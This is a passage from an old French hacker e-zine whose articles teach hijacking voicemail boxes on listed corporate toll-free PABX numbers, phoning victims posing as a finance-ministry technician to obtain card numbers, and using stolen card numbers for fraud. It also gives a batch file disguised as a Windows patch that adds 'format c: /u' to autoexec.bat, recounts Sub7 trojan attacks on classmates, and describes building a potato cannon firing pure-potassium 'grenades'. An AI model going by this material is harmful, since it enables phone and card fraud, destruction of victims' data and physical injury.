gnral deux options : soit dposer un message, soit accder  sa VMB pour couter ses messages. 
	Maintenant, le but du jeu sera de trouver une VMB de libre pour que tous vos potes puissent 
vous laisser des messages gratuitements :) Vous allez donc choisir l'option couter ses messages. 
Ensuite, la dame va vous demander le numro de la VMB, ils sont gnralement  quatre chiffres et 
commencent souvent par 4. Pour trouver un numro de poste valide, essayez d'abord le 4, si la dame 
ne dit rien, cela veut dire qu'il existe des postes compris entre 4000 et 4999. Puis vous continuez, 
avec 1 par exemple, si elle ne dit rien, il existe des postes compris entre 4100 et 4199, vous 
continuez comme a, et vous devriez tomber rapidement sur un numro de poste valide. 
	L, soit vous entendez le message d'un employ et vous cherchez une autre VMB, il vaut mieux 
pas prendre celle d'un employ sinon, ils vont se rendrent compte qu'il ont t pirat et vont vrifier 
toutes les VMB du PABX et vous avez perdu un numro vert :( Par contre si, on vous dit que la VMB n'est 
utilise par personne, servez vous :D mettez un mot de passe, un beau message d'acceuil, et voil, vous 
avez une VMB flambant neuve prte  etre utilise.


4. Quelques numros de PABX
0800 010 800 + * => PABX du groupe Habitat, numros de poste en 4XXX
0800 397 397 + * => PABX de Hilti, numros de postes en 5XXX	
0800 499 499 + * => PABX de la mutuelle Renault
0800 39 39 51 + *
0800 11 34 83 + *
0800 065 065 + * => PABX de Cofidis
0800 002 002 => demande de code confidentiel, si vous en trouver un, n'hsitez surtout pas  me prvenir :)
0800 126 126 => mme remarque que ci dessus

J'espre qu'avec a, vous pourrez vous amuser jusqu'au prochain numro :)) Et je vous expliquerai en 
dtail comment se faire un outdial et tlphoner gratuitement par la mme occasion :)


Conclusion : 
	Voil pour mon premier article, vous vous dites peut-etre que c'est maigre, mais 
je n'avais pas normment de temps et je vous en promet beaucoup plus la 
prochaine fois. En attendant, vous pouvez toujours me joindre  mon mail : elgadir@usa.net 
ou sur ma VMB, elle est sur le 0800 010 800 et ma box est la 4421.


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


	*********************************************************************
	* 14											  *
	*                        Phoner gratis                              *
	*      										  *
	*			 				par NOs-K                 *
	*								                    *
	*********************************************************************


Bon cette fois-ci je vais vous exposer une mthode trs intressante au niveau des techniques
qu'elle enseigne ! Et puis avouez que le but est fort intressant : Tlphoner GRATOS !!!


1. Ce que vous aurez besoin.

Hh..si je vous avez dit: "vous aurez besoin d'un telephone qui est connct chez quelqu'un
d'autre" avouez que a aurait t dj intressant....donc niveau Matos, une bonne paire de
coui**e et a suffira :p


2. Acte I : "Le SE" ou "Les gens sont vraiment con"

Bon ce n'est pas trs compliqu, vous allez vous faire pass pour quemqu'un d'autre (le SE)...et
cette autre personne sera pas exemple "Un technicien informatqueuuu". Pour mieux suivre la
discussion, qui aura pour but de rcuprer nom, prnom, n de carte bleue+ date de validit, on
va vous simbolis par un bonhomme en 1024*768 (Quoi a rentre pas ???) bon alors:

*=Vous et $=Victime

* Bonjour, je suis technicien au service ministerielle des Finances (Inventez un mytho, n'importe
quoi !!) et suite a une intrusion et a la destruction de notre base de donnes, nous devons
vrifier systmatiquement la concordance des nom et prnom avec les numro de cartes de
Crdits afin de remettre en tat notre base de donnes.

$ Vouiiiii

* Alors donnez nous votre nom prnom.

$ Mme Ginette Roberta

* (touffez un rire, les bofes ont tjs un nom a couch dehors :p) Attendez deux petites
seconde...(si vous avez un Pc a portez de main tapez comme un bourrin dessus :p)

Si vous avez pris votre victime au hasard dans un annuaire, regardez l'adresse et dite : 

* Donc Madame Ginette Roberta, 15 rue des Fucker ?

$ Vouiii c a !

* Maintenant nous allons procder a votre identification Bancaire.

$ Vouiiiii

* Donnez moi votre numro de carte bleue ainsi que la date de validit. Si vous n'en avez pas, Au
revoir. Faites attention car si vous vous trompez dans le numro vous ne pourrez plus rien retirez
ni acheter (En clair faut faire flipper Ginettte !!!)

$ Tout de suite (elle fouille dans son sac a main) 2566 5656 5454 4545 et la date de validit
02/00

* Bien merci beaucoup Madame, au revoir. Vous devriez recevoir un courrier dans les jours qui
viennent.

$ Au revoir

**** Fin de la Discussion !

Et voil vous tes heureux ?? Bon passons a la suite :


3. Acte II "Les Tlphones" ou "Y a pas d'ot titre"

La partie a mon avis, la plus dlicate il s'agit de commander le tlphone miracle en l'envoyant
a une adresse prcise ( pas la votre bandes de cons),vous passez la commande par minitel
mthode la plus rapide et la plus anonyme, par l' INTERNET ou par tlphone (le minitel c'est
bcp mieux....).Vous commander un telephone sans fil multicombins avec la plus grande portee
en gnral 400 m (Non pas de CB :p) et deux ou trois combines supplmentaires pour vos
potes ou pour en avoir en reserve,puis envoyez tout a a une adresse que vous aurez dfinie
choisissez l'envoi en 24h si vous n'tes pas patient. Deux jours aprs avoir fait la commande,
rendez vous a l'adresse ou vous avez envoyez le paquet avec soit une lettre bidon de la boite de
VPC que vous aurez faites vous mme mentionnant une erreur de leur part pour l'adresse de
rception soit si vous avez au moins 25-30 ans vous faire passez pour un des livreur pour
rcuprer le paquet.(ou alors vous allez vous faire fouttre j'ai plus d'ide :p)


4. Acte III: "Le Concours" ou "Les gens sont vraiment con !"

Bon le but consite a refil un des combins a un type quelquonque qui habite pas loin (ou loin
si vous voulez maus c'est pas pratique puisqu'il faut tre a moins de 400 M de lui :))

Donc par exemple vous allez l'offrir en cadeau a un concours (Radio, Tl, Mag...comme vous le
sentez !)

* Bonjour Mr Merde de Nizo

$ Bonjour...

* Savez vous qui je suis ???

$ Non mais vous allez me le dire

* Je suis Robert de Ginette !! Et vous avez t choisi pour participer a notre concours !

$ Quoi ?? (L normallement c'est un baufe donc il pisse dans son froc :p)

* Alors premire question : "Qui a gagn la coupe du monde"

$La France ?

* Ouiiiii (meme si c'est faux dite pareil :))

* Qui a gagn la premire guerre mondiale ?

$ L'auTriche ?

*Bravo vous avez gagn un tlphone sans fil dernire gnration !!! Nous allons passez hors
antenne pour prendre vos coordonnes...

$YEAHHH

Et voil il est bien nik le baufe ! Vous lui envoyez dans un bo carton, avec des pubs partout et
vous mettez une lettre lui disant qu'il a gagne ensuite quand vous voulez phonez vous allez
devant chez lui ( ou vous restez chez vous si c'est a moins de 400 M) et puis voil c'est fini :)

	
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



      *********************************************************************
	* 15										        *
	*                    La Programmation Batch                         *
	*      										  *
	*			                                par N0s-k         *
	*								                    *
	*********************************************************************



1.Intro Aux Batchs
------------------

Tout le monde connat autoexec.bat... mais, comment on le modifie? Est-ce un langage ?
Cela en est un tout en en tant pas un... en ralit, les fichiers batch (ou traitement pat lot)
ne sont qu'une suite d'instructions qui seront excuts dans l'ordre indiqu. Quels sont les
avantages? Facile d'utilisation, pas grand chose a apprendre de nouveau et surtout trs 
pratique... et il y a aussi la possibilit de transformer un .bat en .com (allez regarder
votre .com avec wordpad... c'est autre chose que votre .bat non?)
Concrtement avec le Batch vous pouvez crer un "programme" qui va modifier Autoexec.bat 
pour qu'il lance un virus au dmarrage... ou mme en crer un !
Dj, un exemple de Batch:

@echo off
echo.
echo Ceci est un Batch
echo On va now installer un Patch pour Windaube....
pause
echo Installation en cours veuillez patientez...
echo Pause >> C:\Autoexec.bat
echo format c: /u >> C:\autoexec.bat
Veuillez insrez une disquette
pause
format a: /u
copy C:\windows\win.ini A:\*.*
cls
echo Mise  jour Effectue


Explication:
------------

@echo off : Mettez toujours a, a va eviter de mettre sur la ligne de commande ce que vous
 voulez faire comme si vous le tapiez en mme temps... et mme si votre victime est un lame
 a pas lui plaire de voir autoexec.bat et format sur la mme ligne :)

echo. : Echo est une commande qui affiche quelque chose a l'cran et s'il est suivi d'un 
point, cela signifie qu'il va sauter une ligne.

echo truc : Affiche truc a l'cran

Pause : Va stopper le programme et afficher le typique message 'appuyez sur une touche 
pour continuer'

echo Pause > Autoexec.bat : C'est quelque chose de trs important... on peut utiliser echo 
avec un redirecteur de sortie ">" qui va effacer tout le contenu de autoexec.bat et mettre
dedans "pause" (puisque c'est avant le ">") C'est trs pratique par exemple vous pouvez 
crer un bat qui va lister tout le systme avec la commande "tree" et va mettre tout a 
dans tree.txt, par exemple...

echo Format C: /u >> C:\autoexec.bat : A la difference de ">" qui efface tout dans le 
fichier 'cible', ">>" ajoute au contenu de la cible, donc si on ouvrait a cette tape 
C:\autoexec.bat, on trouvera "Pause" et "Format"

copy [...] : pas besoin d'explication, c'est juste pour vous montrez que l'on peut mettre 
des commandes dos dans les fichier Batch =)

cls : Efface l'cran (pour pas qu'il voit que l'on s'est foutu de sa gueule en copiant un
sel fichier et qu'en plus il ne sert  rien :)

Voil je vous ai expliqu ce programme digne d'un lame, c'est pour a que vous ne 
l'utiliserez pas =)

2.Commandes Avances
--------------------

Tout d'abord, la commande 'goto' et la cration de bloc. Comme toujours un petit exemple:

@echo off
cls
echo On va au bloc 1
GOTO 1

:1
echo on va au bloc 2
GOTO 2

:2
echo On quitte le programme

Y a juste une chose a dire, les ':' indique le dbut d'un bloc.

La commande if, dcline en plusieurs variante:

IF EXIST Fichier : Cette condition vrifie tout d'abord l'existence du fichier, et ce 
n'est qu'ensuite et seulement si le fichier existe bel et bien sur le systme, que la 
commande est excute. 	

IF Valeur==Valeure : vrifie tout d'abord si les deux valeurs sont identiques. Si c'est le
cas, la commande s'excute aussitt. 	

IF ERRORLEVEL : Si un programme restitue un code d'erreur, celui-ci peut servir de 
condition pour dcider de la suite des oprations. 
Un petit Exemple =)

IF EXIST FICHIER 
GOTO RENAME
ECHO Le FICHIER est introuvable
GOTO FIN
:RENAME
REN FICHIER NOUVEAUNOM
ECHO Le FICHIER a t renomm
:FIN

Ce programme vrifie si le fichier existe avant de le renommer. (C'est franchement inutile
mais on s'en fout c'est un exemple :))
	
Ensuite, une commande importante, "CHOICE". Elle permet de faire des menus (Enfin 
pas vraiment...) et utilise avec le commande "if error level" permet de rediriger vers 
une autre partie du "programme". Voici un exemple pour mieux comprendre :

@ECHO OFF
ECHO.
ECHO Menu de dmarrage:
ECHO 1) Aller sous Windows
ECHO 2) Charger Turbo Pascal
ECHO 3) Quitter: retourner sous Dos
ECHO.
CHOICE /C:123 /N
IF ERRORLEVEL 3 GOTO Fin
IF ERRORLEVEL 2 GOTO PascalGo
IF ERRORLEVEL 1 GOTO WinGo  
 
:PascalGo
bp
GOTO Fin

:WinGo
win

:Fin
  
Et voila vous avez un beau menu. Vous mettez a dans autoexec.bat et c cool =)
Remarque: Il faut mettre les ERROR LEVEL par ordre Dcroissant (sinon a marche pas =))
Et maintenant, la dernire commande propre au Batch, j'ai nomm la boucle for ! (Tout le 
monde la connat, dans presque tous les langages elle y est !)
Voici la syntaxe gnrale:

FOR %%Variable IN (Donnes) DO Commande %%Variable

Variable: Un caractre quelconque  mettre en correspondance avec le contenu de "Donnes".
Le rsultat de cette valuation sera arribu  la variable de mme nom situe  la fin de
la commande. Le caractre dfini doit tre le mme au dbut comme  la fin. Les majuscules
et les minuscules sont considres comme des caractres diffrents et peuvent provoquer 
des erreurs. Le caractre  % n'est pas autoris. 	

Donnes: Ensemble d'informations spares par des espaces. Ces donnes seront utilises 
comme paramtres pour la commande qui sera excute sous la variable situe  la fin de la
ligne. Vous pouvez utiliser des variables de substitution pour les fichiers de commandes 
(%1 . . .%9), ainsi que des jokers. 	

Commande: Une commande quelconque. Vous pouvez spcifier une commande de MS-DOS ou le nom 
d'un autre programme, mais vous ne pouvez pas imbriquer plusieurs commandes avec FOR. 
Bon je sais ce n'est pas trs clair, mais deux petits exemples devraient vous aider, non ?

Exemple 1:
----------

 FOR %%A IN (PASCAL PIERRE JULIEN ERIC PATRICK) DO ECHO %%A

La commande FOR introduit le premier nom  la place de %%A, puis excute la commande echo 
pour la variable situe en fin de commande. Le premier nom, Pascal, s'affiche sur l'cran.
La commande FOR introduit ensuite le second nom, Pierre. Comme le montre cet exemple, les 
chanes de caractres indiques sous "Donnes" s'affichent successivement  l'cran.

Exemple 2:
----------

 FOR %%d IN ( *.BAK *.TMP ) DO DEL %%d

Les fichiers rpondant aux critres spcifis sous "Donnes" sont introduits sous la 
variable %%d et serviront de paramtres  la commande DEL De cette faon, tous les 
fichiers portant l'extension indique seront dtruits.

Exemple 3:
----------
Voici une autre faon d'utiliser une boucle FOR:
 
FOR %%A IN (TYPE PAUSE DEL) DO %%A %1

L'instruction ci-dessus fait dfiler le fichier ( =TYPE ) reprsent par la variable %1 et
efface, aprs une PAUSE le contenu de la variable %1. Cette variante vous offre de 
nombreuses possibilits dans un fichier de commandes.
Si vous excutez la commande FOR directement au clavier, sans passer par un fichier de 
commandes, ne spcifiez qu'un seul signe % :

FOR %A IN (PASCAL PIERRE JULIEN ERIC Patrick) DO ECHO %A

Conclusion:                                                                        
-----------

Bon j'espre que c'est clair pour tout le monde et vous avoir donner envie de vous lancer 
dans la programmation batch...En fait mme si ce n'est pas un vrai langage au sens ou on 
l'entend c'est de tout de mme un trs bonne outils...je vais mettre dans le site ou dans 
le zip du zine le convertisseur BATCH > COM 

  
                                                   
											N0s-k 


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



      *********************************************************************
	* 16	  									        *
	*               Les lamers, decouverte d'une nouvelle maladie ;)    *
	*      										  *
	*	     par Elgadir                                              *
	*								                    *
	*********************************************************************




	Bonjour a tous, ceci est mon premier article dans un emag (srieus;) et vous ne
pouvez pas imaginer l'motion qui s'empare de moi dans ce moment de bonheur suprme et
inaccessible pour le commun des mortels scotches devant tf1 a cette heure la. 
Excusez-moi, je m'gare mais revenons  nos lamers, euh... nos moutons :)

	Je vais vous parler maintenant, des lamers, il y en a dans mon bahut qui sont trs
forts :)) Et le but de ce file sera de vous montrer qu'il existe 2 niveaux a cette 
lamerozite, maladie, hlas, trop rpandue. Et n'oubliez pas que tous les faits relats 
ici sont vridiques :) Tout commena en janvier dernier, j'tais  cette poque un 
l4M3R ;) d'ailleurs, a me dsespre, mais tout le monde y passe, certains y restent... 

	Donc, en janvier, j'ai russi  avoir mon 1er PC grce  du carding (je sais, j'ai
honte, et puis je me suis fait reprendre...), je m'intressais un peu, au "hacking" et je
dcouvre Sub7 (Ouaisssssssss :))) je dcide de l'utiliser sur un gars dans mon lyce (je 
n'avais que son UIN), je rentre facilement sur son pc (il avait pas cache l'ip dans icq et 
n'avait aucun antivirus :)), j'tais trop content a ce moment :)

	La, vous vous dites : "il va nous parler des lamers, mais c'est de lui qu'il parle, 
c'est vraiment un L4m3r ce mec". Bon, jusque la, ok, mais je continue.

	Donc, le mec russi m'appelle et trs impressionne me demande comment j'ai fait, je
lui explique et s'empresse d'utiliser sub7 sur tous ses copains. Il faut dire, que dans sa

classe, ils formaient une bande de potes assez comiques : chacun avait sa mailing list et 
ils s'envoyaient chaque jour la blague du jour de rigoler.com. Si t'tais abonne  ces 
listes (je l'ai t un temps) tu recevais chaque jour une blague miteuse en 10 exemplaires
:((

	Ensuite sub7 se propage plus vite que ILOVEYOU dans la classe et ils arrtent 
d'envoyer des blagues (ouff) et ils s'entretuent avec sub7, au moins, comme a ils nous 
foutent la paix... enfin, pas pour longtemps. Ils ont compris qu'il fallait cacher l'ip sous
icq... Et la a commence  entre dur pour moi, exemple de dialogue au bahut : 


he elgadir, j'ai un problme avec sub7, je trouve pas l'ip du mec que je veux hacker
he elgadir, j'ai un problme avec sub7, je trouve pas l'ip du mec que je veux hacker
he elgadir, j'ai un problme avec sub7, je trouve pas l'ip du mec que je veux hacker
.
.
.
piti arrtez, dmerdez vous, puisque vous tes des grands hackers
	

	La, ils se sont calme, mais y'en a un qui tait plus coriace que les autres (merde 
:((). Je dcide donc, de m'amuser un peu avec lui, a a dure  peu prs une semaine :



LUNDI

he elgadir, j'ai un problme avec sub7, je trouve pas l'ip du mec que je veux hacker

viens ici mon ami, je vais t'aider

merci, t'es trop sympa

alors comme a, tu veux avoir l'ip d'un mec alors qu'il l'a cache sous icq...

ben oui

d'abord faudrait que tu me dises pourquoi tu veux le hacker, parce que, c'est trs 
dangereux le hacking, tu peux aller en taule

(l'air convaincu) oui c'est vrai, mais a me fait pas peur, il faut que je rentre 
sur l'ordi de lamer4

c'est vrai, sur l'ordi de lamer4????

(l'air trs content) oui oui 

a a veut dire que t'es un dieu du hacking, lamer4, c'est trop dur de rentrer 
sur son ordi, j'ai essay sans y arriver

c vrai?

oui, mais je suis sur que toi, tu y arriveras, je vois dans ton regard et 
dans ta faon de parler que tu es un grand hacker

(encore plus content) putain, cool

tu veux savoir comment on t'appellerait dans le milieu du hacking?

oh oui

tu serais un lamer, le plus grand des lamer

trop cool, c'est chanm

[fin du djeuner]


MARDI

[l4m3r arrive au bahut]

(criant bien fort a la cantonnade)He les gars, vous savez quoi?

non, quoi?

Je suis un lamer, a veut dire que je suis un grand hacker, c elgadir qui me l'as dit
[comme j'avais t le 1er a dcouvrir sub7, il me vouaient tous une admiration]

he elgadir, c vrai a?

ben oui, lui c'est le dieu des lamers, mais vous aussi, vous en tes, vous 
en faites pas, vous tes tous des lamers, vous tes une grosse bande de bons lamers

(tous vachement content)trop cool


MERCREDI

Bon, alors, comment je fais pour avoir l'ip du mec??

c assez dur, mais tu peux le faire

bon, dis le moi alors

alors la c'est trs simple, mais par contre tu dis a  personne

aucun problme

tu vois, il existe un serveur pirate a qui tu envoie l'uin du mec et tu reois 
l'ip dans un .exe [a l'poque mon seul but tait de niker les PCs des plus gros lamers que moi]

c vrai, tu peux me filer l'adresse du serveur

c icqhack@usa.net

(gobant tout)put1 merci, t trop sympa

de rien, de rien


	Bon, maintenant, vous imaginez la suite, je suis rentrer sur son pc sans trop de
problme, et il tait trop vnre quand il a vu le .txt que j'avais laisse sur son bureau. 
Mais j'espre que vous comprenez bien que moi, je ne touche plus a ce genre de logiciel et 
que vous m'excuser de ma priode lamer. D'ailleurs, je pense que beaucoup d'entre vous sont 
passs par la, mais vous n'y tes pas rester. Notre cher ami (l4m3r), est reste  ce stade 
primitif de l'volution de l'homme et je pense qu'il y restera encore longtemps. 

Explications : 

	Pendant quelques mois, il ne m'as plus du tout fait chier, mais dbut juillet, il a 
de nouveau des pulsions sanguinaires et des envies de "hack da planet". Comme il m'as 
beaucoup fait chier en me demandant ou on pouvait dl sub7, il recommence son harclement par 
icq et je cde tout en sachant kil aurait pleins d'autres questions a me poser (et merde). 
Je lui file un crack qui marche pas. La, je lui explique que c'est lui qu'a pas russi  le 
faire marcher, puis je lui dis qu'il doit formater son disque et qu'aprs a marchera. 
j'avais une vieille excuse genre : "c'est ton diteur de registre qu'est mal configure avec 
le noyau et puis la random access memory empche l'excution du .exe". Le con, il a tout 
gobe et s'est tape une rinstallation. Le crack ne marchant toujours pas, il dcide 
d'essayer sub7 et j'ai encore droit a pleins de questions : 

l4m3r (ICQ#xxxxxxxx) Wrote:
dans sub7 c est quoi le remote et le virus???
le truc appele  "serveur" c est koi????

l4m3r (ICQ#xxxxxxxx) Wrote:
bon aller sois pas vache!!!!
repond moi???????????????????????????????????????????????????????????????????,

l4m3r (ICQ#xxxxxxxx) Wrote:
c est koi qu il faut que j envoie a la victime????
subseven.exe???
serveur.exe
editserveur.exe  ????????????

elgadir Wrote:
put1, t'en as de la chance t'es un gros lamer

l4m3r (ICQ#xxxxxxxx) Wrote:
pkoi?? chance?

elgadir Wrote:
ben, moi j'aimerais bien tre un aussi
bon lamer que toi, mais jen'ai pas 
tes capacites malheureuseument :((

l4m3r (ICQ#xxxxxxxx) Wrote:
prend moi pour un con!!!!

l4m3r (ICQ#xxxxxxxx) Wrote:
j ai bonne nouvelle
t es aussi un lamer

elgadir Wrote:
je sais, mais la tu me fais chier alors
TA GUEULE


	Ce petit dialogue m'est arrive aujourd'hui et j'espre que a l'aura calmer, mais 
bon, avec lui, faut pas avoir trop d'espoir :((



Conclusion : 

	A travers ce petit file, vous avez put dcouvrir les qualits des lamers qui hantent
 mon lyce. Mais je vais finir sur ce que je pense de cette maladie (la lamerozite), je 
pense qu'elle peut tre dcompose en deux niveaux : le 1er, c'est un etat maladif temporel 
par lequel je suis passe (et peut tre vous aussi) : l'utilisation des trojans. Bien sur, 
ce 1er niveau, on est sauve car, on s'en sort assez rapidement. Par contre le 2eme niveau 
est beaucoup plus dangereux pour l'entourage immdiat du lamer (comme vous avez put le 
constater avec moi), quoique le lamer fasse, il reste lamer, c'est inscrit dans ses gnes, 
il cherchera toute sa vie a comprendre comment marche un trojan et a quoi sert serveur.exe. 
Mon conseil serait de vous loigner de ces personnes pour qu'elles ne vous contaminent pas 
avec des questions connes. Si vous pouvez vous en dbarrasser, ce serait mme trs bien, il 
faut dbarrasser la terre de toute cette vermine qui pullule dans nos contres civilises, 
alors rejoignez tous la LRCL (ligue rvolutionnaire contre les lamers) que je viens de crer
et nous ferons ensemble de la terre et d'irc un endroit vivable pour nous, citoyens 
exemplaires et dots d'une intelligence suprieure ;))


                        					Elgadir
									


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.




	*********************************************************************
	* 											  *
	*                            Le Mad. Rocket. Laucher                *
	*      										  *
	*			 				par [_M_A_D_]             *
	*								                    *
	*********************************************************************



Pour le premier numro de ce mag, je tenais  prsenter quelque chose de trs fun 
histoire d'pater les lecteurs ;). Alors j'ai dcid de dvoiler au grand jour une de mes
inventions qui est d'aprs moi la plus chaotique, cool, non ?
Je tiens  prciser que l'utilisation de mon invention est rserve au plus fls
d'entre vous.
Bon finis l'intro  deux balles et passons au fun :)

Le MaD's RoCKeT LauNCHeR
------------------------

Description:

Il s'agit de l'union d'un lance-patate avec des rockets au Potassium pur .

1) Matos ncessaire
-------------------

1.a) Le lance-patate ( facile  faire et pas cher )
----------------------------------------------------

- un tube PVC de 80mm de diamtre de 80cm de long (Fig.1)
- un tube PVC de 50mm de diamtre de 1m de long (Fig.2)
- un adaptateur 80mm/50mm (Fig.3)
- un bouchon de 80mm (Fig.4) et son pas de vis (Fig4')
- des petits rducteurs pour adapter les diffrentes pices
- un allume-gaz (Fig.5)
- deux fils lectriques et un sucre
- du scotch large, du papier de verre
- de la colle pvc et de la colle noprne
- un spray
	

						    ____
						 __|(5) |
						|__|____|
  			      	 _____	 _______________   ____   _
				|     | |		| |    | | |
    ___________________	  ______| (3) |	|      (1)	| |(4')| (4)
   |________(2)________| |____________|	|_______________| |____| |_|

 	 
		
     
1.b) La Rocket
--------------

- une  deux cuillres de Potassium pur attention !!!
  * pour vous en procurer facilement si vous tes encore en cours, il y a 
    srement du K dans le labo de chimie d'un lyce et d'un collge sinon
    vous pouvez toujours sortir un mytho au prof comme quoi vous dsirez 
    faire une petite exprience  la maison ;)
- eau
- coton
- rcipient en verre d'un peu moins de 50mm de diamtre avec deux bouchons
  de chaque ct avec une spartion au milieu waterproof et hermtique



2) Elaboration
--------------

2.a) Le lance patate
--------------------

- coller avec la colle PVC, aprs avoir ponc, les parties en contact des
  pices 3,1 et 4' en intercalant, si besoin, des petits rducteurs.
- ouvrir l'allume-gaz et brancher les fils lectriques  la place des 
  lectrodes grce au sucre.
- percer un petit trou dans le tube 1 pour y faire passer les fils et vrifier
  que leur cartement est optimum pour avoir une bonne petite tincellounette :
  faire un noeud avec les 2 fils ou placer un sucre et deux aiguilles ( plus
  classe mais pas indispensable )
- mettre de la colle noprne sur le trou par o passent les fils pour une 
  bonne tanchit de l'ensemble
- attention, ne collez surtout pas le canon, sinon vous ne pourrez pas 
  charger votre MaD's RoCKeT LauNCHeR et vous passerez pour un pauvre gars ;)

a devrait donner a:


						  __
					        _|  |
  			      	 ______________|_|__|_____   _
				|     |	              |   | | |
    ___________________	  ______|     |               |   | | |
   |___________________| |____________|_______________|___| |_|

- Une fois le tout bien sec vous n'aurez plus qu' charger votre M.R.L. avec
  la rocket ou pour juste le fun et pour pas semer mort et destruction sur votre 
  passage, essayer avec des petits-suisses, des patates bien sur, journaux, ...
- Emboter les munitions dans le rducteur (Fig.3), puis prenez l'arosol
  inflammable ( viter les bombes  chiottes trop humide, les fils lectriques 
  n'aiment pas trop ). Vous envoyer deux petites giclettes environ, renfermez
  vite le bouchon (Fig.4), visez, tirez ... ;)



2.b) La rocket
--------------

- prenez le cotton et mettez en au fond d'un des cts 
- mettez  peu prs 1/4 de potassium pur du mme ct

  *****************************************************************
  *** faites attention que vos mains soient parfaitement sches ***
  ***   le potassium pur agit trs violemment avec l'eau !!!!   ***
  *****************************************************************

- remplissez maintenant ce ct entirement de coton ( pour propager l'eau )
- fermer dlicatement ce ct trs doucement mais le plus serr possible
- de l'autre ct remplissez avec le plus d'eau possible

Voil vous venez de faire une des grenades les plus stables possibles :)

PS: si vous n'arrivez pas  trouver de potassium ne pleurez pas, essayez
    alors de trouver de la soude pure a marche trs bien aussi ;)

3) Conseil technique
--------------------

- Veillez que ce que vous chargez ne prenne pas tout le diamtre du canon
- Si a marche pas, vrifiez si vous avez bien une tincelle, si oui, faites
  diffrents essais avec plus ou moins de gaz ( chaque M.R.L. est unique
  en port, en prcision, etc.. )
- Soyez deux pour charger c'est plus pratique
- Le projectile ira dans les 20  50 mtres donc faites des essais avec
  des object ayant le mme poids mme matire et envergure
- Visez avec un angle de tir entre 60 et 75 pour une porte maximale
- Protgez vous derrire un MDL-Wall genre bac  fleurs, murets, etc..


	//-------------------------------------------------------//
	// Article crit par [_M_a_D_] pour le magazine BSCmag.  //
	// [_M_a_D_] n'est en aucun responsable de vos actes.    //
	// [_M_a_D_] n'est pas non plus responsable si vous	   //
	// dchiquetez votre petite soeur en lambeaux ;)	   //
	//-------------------------------------------------------//



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



	*********************************************************************
	* 18											  *
	*                        Bien utiliser un no de CB                  *
	*      										  *
	*			 				by Elgadir                *
	*								                    *
	*********************************************************************




Vous avez tous lut l'article de NOs-K pour phoner
gratos, mais bon, c'est assez chaud a mettre en oeuvre 
quand mme (je sais que toi, t'as reussi NOs, t'es notre 
matre vnr et le meilleur, on n'y peut rien... un peu de 
lche ca fait pas de mal ;)), donc, maintenant, je vais 
vous expliquer plusieurs mthode plus soft pour appeler 
gratuitement votre grande tante en Inde, et, accessoirement, 
mais a sert vraiment  rien, pour aller gratuitement sur le net,
et aussi, bien sur, je vous direz tout ce qu'on peut faire
avec un No de CB.

	Donc, vous avez lut l'article de NOs (celui pour phoner gratis),
si c'est pas fait, qu'attendez vous pour le faire, putain, yen
a qui comprennent jamais rien, merde ! Bon, si vous me
suivez toujours, on va pouvoir commencer.

	Alors, vous commencez par chooper un No de Carte
Bleue avec la mthode  2F30 de NOs ;) En fait, elle est
cool cette mthode, parce qu'on a aussi le nom de la personne
 qui appartient la carte, parce que, aujourd'hui, c'est pas 
comme avant (pas possible :o), c'est  dire, qu'il y a encore
... euh ... longtemps, on trouvait encore des sites pour acheter
des tlphones sans fils longue distance o yavait pas besoin
de mettre le nom qui est sur la carte ...

<STOP>
moi : euh, oui, Jean-Pierre, tu me dis koi?
JP : blabla
moi : koi ta femme est morte, j'en ait rien  foutre, donne moi
plutot l'info qui vient de tomber, j'ai des lecteurs, moi!
JP : ouinnnn :(( blablabla
<STOP>

Excusez moi chers lecteurs, mais je viens d'apprendre que ma femme
est morte ... euh... non, pardon :o) Ah oui, il existe encore des sites
o on peut payer avec juste le No de la CB. L'info vient juste de tomber.
C'est formidable, mes frres, ftons a ...

<STOP>
moi : JP, ammene la beuh et le whisky, et plus vite que ca !!!
<STOP>

Mes frres, tout va pour le mieux dans le meilleur des Webs, Il existe.
Mais, bon, faut pas abuser, je vous filerais le site qu' la prochaine
issue de mag ;) ==> www.alaxis.com

	Excusez moi, je dlire, je ne dois pas tre dans mon tat normal ;)
mais, revenons plutt  ce qui nous interresse. Donc, vous avez appliqu
comme un con le truc de NOs, vous avez vot pauvre No de CB avec le nom du bof 
 qui il appartient. Essayer d'en rcuprer plusieurs, pachke, vaut mieux
changer de No de CB  chaque fois que vous commanderez un truc.

	Maintenant, vous savez absolument pas  quoi peut bien servir le No
de CB d'un bof ;) Ben  rien, paske ya pas de fric de ssus, c'est un bof ;)=
Je vais rpertoriez pour vous les diverses faon d'utiliser ce No.

I. Le fumer
L, c plutt cool, mais  la seule condition que vous ayez ecrit le No
sur une feuille  rouler. Et aussi bien, sur, fumez de la bonne weed, pas
du shit marrocain tout nul !

II. Le bouffer
L, c'est si vous tes un peu con ou que vous avez absolument que dalle dans
le frigo. Perso, j'ai pas tester, si vous le faites ==> mailez moi :)

III. Phoner gratos
Ah ah, je parle de tlphone gratuit et tout le monde se rveille, ah ah,
vous tes tous aussi cupides les uns que les autres, mais dans quel monde
vit-on?

3.1 La technique  NOs (voir plus haut)

